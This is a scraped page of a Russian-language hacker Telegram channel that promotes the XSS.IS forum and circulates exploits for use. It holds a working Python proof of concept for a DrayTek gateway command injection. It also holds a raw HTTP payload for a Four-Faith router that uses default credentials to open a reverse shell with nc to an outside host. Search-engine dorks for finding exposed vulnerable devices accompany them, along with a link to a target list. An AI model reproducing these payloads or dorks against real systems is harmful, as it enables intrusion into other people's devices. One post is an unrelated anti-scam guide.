freedomf0x | Unsorted

Telegram-канал freedomf0x - Freedom F0x

4

Subscribe to a channel

Freedom F0x

Кого поиметь поломать на праздниках :)))

Взято тутъ platshit.com

копия https://pastebin.com/dceH4yXP

оригинал https://docs.google.com/spreadsheets/d/1z_z4F8JF5W_F2k3vf_tURif6wFYzNQ2dXmMB-8h1X9M/edit?gid=126673316#gid=126673316

Читать полностью…

Freedom F0x

Оригинал и исходники на XSS.IS

А ты уже с нами!!!

Читать полностью…

Freedom F0x

I’m watching you! How to spy Windows users via MS UIA

Новый метод слежения за пользователями. Вперед на вооружение армии #кибершпионов

POC

#windows #malware #spyware

Читать полностью…

Freedom F0x

LitterBox

Sandbox approach for malware developers and red teamers to test payloads against detection mechanisms before deployment.

Читать полностью…

Freedom F0x

КОНКУРС СТАТЕЙ #10. Призовой фонд 20.000$ на XSS.IS

Гвозди в крышку гроба Telegram: Подмена и Блокировка контента.

(Не) очередная статья о том, почему Telegram не стоит использовать НИ-ДЛЯ-ЧЕ-ГО кроме переписунек с друзьями.

Читать полностью…

Freedom F0x

CVE-2024-12987: DrayTek Gateways Remote Command Injection

PoC:

import socket
import socks


def send_http_request(host_ip, host_port, request):
socket.socket = socks.socksocket
try:
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
s.settimeout(10)
s.connect((host_ip, host_port))
request = bytes.fromhex(request.decode())
s.sendall(request)
print("HTTP request sent:")
print(request)

response = b""
while True:
data = s.recv(4096)
if not data:
break
response += data

return response.decode('utf-8', errors='replace')
except Exception as e:
print("An error occurred:", e)


if __name__ == "__main__":
host = '<TARGET_IP>'
port = '<TARGET_PORT>'

request_apmcfgupload_pwd_binary = b'474554202F6367692D62696E2F6D61696E66756E6374696F6E2E6367692F61706D63666775706C6F61643F73657373696F6E3D7878787878787878787878787878787878787878787878787878787878787878787878787878787878787878787878787878787830B42535322463253532246370776420485454502F312E300D0A0D0A'

response = send_http_request(host, port, request_apmcfgupload_pwd_binary)

print("HTTP response received:")
print(response)


Query:
FOFA: app="DrayTek-Vigor300B" || app="DrayTek-Vigor2960"
ZoomEye Dork: app="DrayTek Vigor 300B broadband router httpd" || app="DrayTek Vigor2960 router httpd"

Читать полностью…

Freedom F0x

А ты уже с нами!!!

Читать полностью…

Freedom F0x

❄️👽❄️ От всей души поздравляем вас с наступающим 2025 годом!

👽 Желаем меньше инцидентов и детектов, но больше удачных проектов и легких таргетов. Пусть ваши системы всегда остаются крепкими, как Русский дух, а пароли – сложными, как политическая обстановка в мире.

С почтением, 🦊.

Читать полностью…

Freedom F0x

Инструкция по противодействию мошенникам:

1. Если любой звонок с незнакомого номера идёт через мессенджер - сразу сбрасывать. Не думая. Кем бы ни представлялись. Повторюсь. Сразу нахуй

2. Звонок на телефон может быть с подменой номера. Там будет номер хоть Администрации Президента. Не смотрите на номер. А если номер вообще не знакомый, то зачем вам его снимать (если не ждёте звонок от условного курьера).

3. Если с вами пытается говорить сотрудник любого, подчеркиваю, ЛЮБОГО органа власти уровня МВД, ФСБ, Налоговой и тэ дэ, то сразу предложите им общаться в "установленном Законом порядке". Звонок по телефону им не является. Если они отвечают херь, то сразу отправляйте лесом.

4. ЦБ не звонит гражданам. Повторюсь, НЕ ЗВОНИТ. С госуслугами аналогично.

5. Да, банки звонят клиентам. Но если вы их пошлёте нахер, то ничего не произойдёт. Они найдут способ, как с вами связаться, если что-то срочное (а такого нет).

6. НИКОМУ, НИКОМУ не говорите коды из СМС. Даже жене/мужу/детям/коту (ладно, коту можно).

7. Если вам кто-то говорит взять кредит - сразу посылайте. Без вариантов. Даже если это реклама

8. НИКТО И НИКОГДА не из мошенников не попросит переводить деньги на "безопасный счёт". Да на любой счёт не попросят.

9. Если вы считаете, что ФСБ предлагает по телефону поучаствовать в "спецоперации", то вы - долбодятел.

10. Да, в жизни всякое бывает. Люди попадаются в лапы мошенников. Но когда вам обещают вернуть деньги, если вы совершите теракт, то помните, что сроки там прям сразу огромные. Кем бы ни представлялся абонент на другой стороне трубки. Не совершайте глупостей. Вам НИЧЕГО не вернут.


Да, есть ещё много вариантов, и все, кто читает канал, их знают, но перешлите всем тем, кто из ваших родственников/знакомых этого не знают! Внесём свою маленькую лепту.

P.S. Если вы чувствуете, что разговор какой-то непонятный, то позовите рядом кого угодно. Шанс не попасть в лапы мошенников возрастает на порядок!

Читать полностью…

Freedom F0x

А ты уже с нами!!!

Читать полностью…

Freedom F0x

А ты уже с нами!!!

Читать полностью…

Freedom F0x

А ты уже с нами!!!

Читать полностью…

Freedom F0x

А ты уже с нами!!!

Читать полностью…

Freedom F0x

CVE-2024-50379/CVE-2024-56337 : Apache Tomcat RCE

Query:
HUNTER :/product.name="Apache Tomcat"
FOFA : product="Apache-Tomcat"
SHODAN : product:"Apache-Tomcat"

This vulnerability affects a wide range of Tomcat versions, including 11.0.0-M1 to 11.0.1, 10.1.0-M1 to 10.1.33, and 9.0.0.M1 to 9.0.97.

#1N73LL1G3NC3

Читать полностью…

Freedom F0x

А ты уже с нами!!!

Читать полностью…

Freedom F0x

А ты уже с нами!!!

Читать полностью…

Freedom F0x

Взято на XSS.IS

Читать полностью…

Freedom F0x

А ты уже с нами!!!

Читать полностью…

Freedom F0x

Взято на XSS.IS

А ты уже с нами!!!

Читать полностью…

Freedom F0x

CVE-2024-49112

A critical vulnerability in Windows LDAP client that according to Microsoft allows remote code execution. This exploit leverages the vulnerability to crash target Windows Server systems by interacting with their Netlogon Remote Protocol (NRPC), and LDAP client.

Blog: https://securityonline.info/poc-exploit-released-for-zero-click-vulnerability-cve-2024-49112-in-windows/

Читать полностью…

Freedom F0x

А ты уже с нами!!!

Читать полностью…

Freedom F0x

А ты уже с нами!!!

Читать полностью…

Freedom F0x

Four-Faith Industrial Router CVE-2024-12856 Exploited in the Wild

The attacker leveraged the router’s default credentials, effectively resulting in unauthenticated remote command injection, by sending a specially crafted POST request containing malicious commands embedded within the adj_time_year parameter.

POC:

POST /apply.cgi HTTP/1.1
Host: 192.168.1.1:90
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
Content-Length: 296
Authorization: Basic YWRtaW46YWRtaW4=
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
adj_time_sec=32&change_action=gozila_cgi&adj_time_day=27&adj_time_mon=10&adj_time_hour=11&adj_time_year=%24%28cd+%2Ftmp%2F%3B+mknod+bOY+p%3Bcat+bOY%7C%2Fbin%2Fsh+-i+2%3E%261%7Cnc+192.168.1.206+1270+%3EbOY%3B+rm+bOY%3B%29&adj_time_min=35&submit_button=index&action=Save&submit_type=adjust_sys_time


Query:
HUNTER :/product.name="FourFaithRouter"
FOFA:product="Four_Faith-Products"
ZoomEye Dork: (app="Four Faith Router"&&"F3x36") || (app="Four Faith Router"&&"F3x24")

Читать полностью…

Freedom F0x

А ты уже с нами!!!

Читать полностью…

Freedom F0x

А ты уже с нами!!!

Читать полностью…

Freedom F0x

А ты уже с нами!!!

Читать полностью…

Freedom F0x

А ты уже с нами!!!

Читать полностью…

Freedom F0x

Pryx из Hellcat Ransomware group слегка разокровенничался 🦊

Читать полностью…

Freedom F0x

PoC Exploit for CVE-2024-30085: Windows Elevation of Privilege Vulnerability

#1N73LL1G3NC3

Читать полностью…

Freedom F0x

А ты уже с нами!!!

Читать полностью…
Subscribe to a channel